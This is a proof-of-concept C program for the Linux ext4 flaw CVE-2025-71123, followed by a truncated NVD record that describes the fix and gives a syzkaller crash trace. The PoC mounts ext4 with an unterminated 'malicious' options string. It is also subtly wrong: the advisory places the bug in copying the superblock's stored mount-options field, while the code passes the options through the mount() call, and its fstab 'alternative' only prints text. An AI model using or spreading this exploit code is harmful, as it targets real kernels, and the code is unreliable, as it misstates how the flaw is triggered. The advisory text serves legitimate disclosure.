CVE-2025-71123

#include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/mount.h> #include <fcntl.h> #include <unistd.h> /* * PoC for CVE-2025-71123: ext4 strscpy_pad buffer overflow in parse_apply_sb_mount_options() * * This PoC demonstrates how to trigger the buffer overflow detection by providing * a mount option string that is longer than expected (63 chars) without proper NUL termination. * * Note: This requires root privileges and a loop device setup. */ #define EXT4_MOUNT_OPTIONS_MAX 65 int trigger_vulnerability(const char *device, const char *mount_point) { /* * Create a mount option string that exceeds the expected 63 characters * and is not properly NUL-terminated. * The kernel expects s_mount_opts to be at most 63 chars + NUL (64 bytes total). */ char malicious_opts[EXT4_MOUNT_OPTIONS_MAX + 1]; /* Fill with repeated pattern to exceed 63 characters */ memset(malicious_opts, 'A', EXT4_MOUNT_OPTIONS_MAX); /* Do NOT NUL-terminate - this triggers the vulnerability */ /* Attempt to mount ext4 with malicious options */ int ret = mount(device, mount_point, "ext4", 0, malicious_opts); if (ret == -1) { perror("mount failed (expected - may trigger kernel warning)"); } return ret; } /* Alternative: Trigger via /etc/fstab with long mount options */ void create_malicious_fstab_entry(void) { /* * Add entry to /etc/fstab with mount options exceeding 63 characters: * /dev/loop0 /mnt/test ext4 defaults,<64_CHAR_OPTIONS_NO_NULL> 0 0 * * Then run: mount /mnt/test */ printf("Create fstab entry with mount options > 63 chars without NUL termination\n"); } int main(int argc, char *argv[]) { if (argc != 3) { fprintf(stderr, "Usage: %s <device> <mount_point>\n", argv[0]); return 1; } printf("CVE-2025-71123 PoC - ext4 strscpy_pad buffer overflow\n"); printf("Attempting to trigger vulnerability with malformed mount options...\n"); return trigger_vulnerability(argv[1], argv[2]); }

{"cve": {"id": "CVE-2025-71123", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-14T15:16:02.000", "lastModified": "2026-03-25T18:28:38.503", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: fix string copying in parse_apply_sb_mount_options()\n\nstrscpy_pad() can't be used to copy a non-NUL-term string into a NUL-term\nstring of possibly bigger size. Commit 0efc5990bca5 (\"string.h: Introduce\nmemtostr() and memtostr_pad()\") provides additional information in that\nregard. So if this happens, the following warning is observed:\n\nstrnlen: detected buffer overflow: 65 byte read of buffer size 64\nWARNING: CPU: 0 PID: 28655 at lib/string_helpers.c:1032 __fortify_report+0x96/0xc0 lib/string_helpers.c:1032\nModules linked in:\nCPU: 0 UID: 0 PID: 28655 Comm: syz-executor.3 Not tainted 6.12.54-syzkaller-00144-g5f0270f1ba00 #0\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\nRIP: 0010:__fortify_report+0x96/0xc0 lib/string_helpers.c:1032\nCall Trace:\n <TASK>\n __fortify_panic+0x1f/0x30 lib/string_helpers.c:1039\n strnlen include/linux/fortify-string.h:235 [inline]\n sized_strscpy include/linux/fortify-string.h:309 [inline]\n parse_apply_sb_mount_options fs/ext4/super.c:2504 [inline]\n __ext4_fill_super fs/ext4/super.c:5261 [inline]\n ext4_fill_super+0x3c35/0xad00 fs/ext4/super.c:5706\n get_tree_bdev_flags+0x387/0x620 fs/super.c:1636\n vfs_get_tree+0x93/0x380 fs/super.c:1814\n do_new_mount fs/namespace.c:3553 [inline]\n path_mount+0x6ae/0x1f70 fs/namespace.c:3880\n do_mount fs/namespace.c:3893 [inline]\n __do_sys_mount fs/namespace.c:4103 [inline]\n __se_sys_mount fs/namespace.c:4080 [inline]\n __x64_sys_mount+0x280/0x300 fs/namespace.c:4080\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0x64/0x140 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nSince userspace is expected to provide s_mount_opts field to be at most 63\ncharacters long with the ending byte being NUL-term, use a 64-byte buffer\nwhich matches the size of s_mount_opts, so that strscpy_pad() does its job\nproperly. Return with error if the user still managed to provide a\nnon-NUL-term string here.\n\nFound by Linux Verification Center (linuxtesting.org) with Syzkaller."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\next4: corrige la copia de cadenas en parse_apply_sb_mount_options()\n\nstrscpy_pad() no puede usarse para copiar una cadena no terminada en NUL en una cadena terminada en NUL de tamaño posiblemente mayor. El commit 0efc5990bca5 ('string.h: Introduce memtostr() y memtostr_pad()') proporciona información adicional al respecto. Así que si esto ocurre, se observa la siguiente advertencia:\n\nstrnlen: desbordamiento de búfer detectado: lectura de 65 bytes de un búfer de tamaño 64\nADVERTENCIA: CPU: 0 PID: 28655 en lib/string_helpers.c:1032 __fortify_report+0x96/0xc0 lib/string_helpers.c:1032\nMódulos enlazados:\nCPU: 0 UID: 0 PID: 28655 Comm: syz-executor.3 No contaminado 6.12.54-syzkaller-00144-g5f0270f1ba00 #0\nNombre del hardware: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\nRIP: 0010:__fortify_report+0x96/0xc0 lib/string_helpers.c:1032\nTraza de llamada:\n \n __fortify_panic+0x1f/0x30 lib/string_helpers.c:1039\n strnlen include/linux/fortify-string.h:235 [en línea]\n sized_strscpy include/linux/fortify-string.h:309 [en línea]\n parse_apply_sb_mount_options fs/ext4/super.c:2504 [en línea]\n __ext4_fill_super fs/ext4/super.c:5261 [en línea]\n ext4_fill_super+0x3c35/0xad00 fs/ext4/super.c:5706\n get_tree_bdev_flags+0x387/0x620 fs/super.c:1636\n vfs_get_tree+0x93/0x380 fs/super.c:1814\n do_new_mount fs/namespace.c:3553 [en línea]\n path_mount+0x6ae/0x1f70 fs/namespace.c:3880\n do_mount fs/namespace.c:3893 [en línea]\n __do_sys_mount fs/namespace.c:4103 [en línea]\n __se_sys_mount fs/namespace.c:4080 [en línea]\n __x64_sys_mount+0x280/0x300 fs/namespace.c:4080\n do_syscall_x64 arch/x86/entry/common.c:52 [en línea]\n do_syscall_64+0x64/0x140 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nDado que se espera que el espacio de usuario proporcione el campo s_mount_opts de una longitud máxima de 63 caracteres con el byte final terminado en NUL, use un búfer de 64 bytes que coincida con el tamaño de s_mount_opts, para que strscpy_pad() realice su trabajo correctamente. Devuelve un error si el usuario aún logró proporcionar una cadena no terminada en NUL aquí.\n\nEncontrado por el Centro de Verificación de Linux (linuxtesting.org) con Syzkaller."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": " ... (truncated)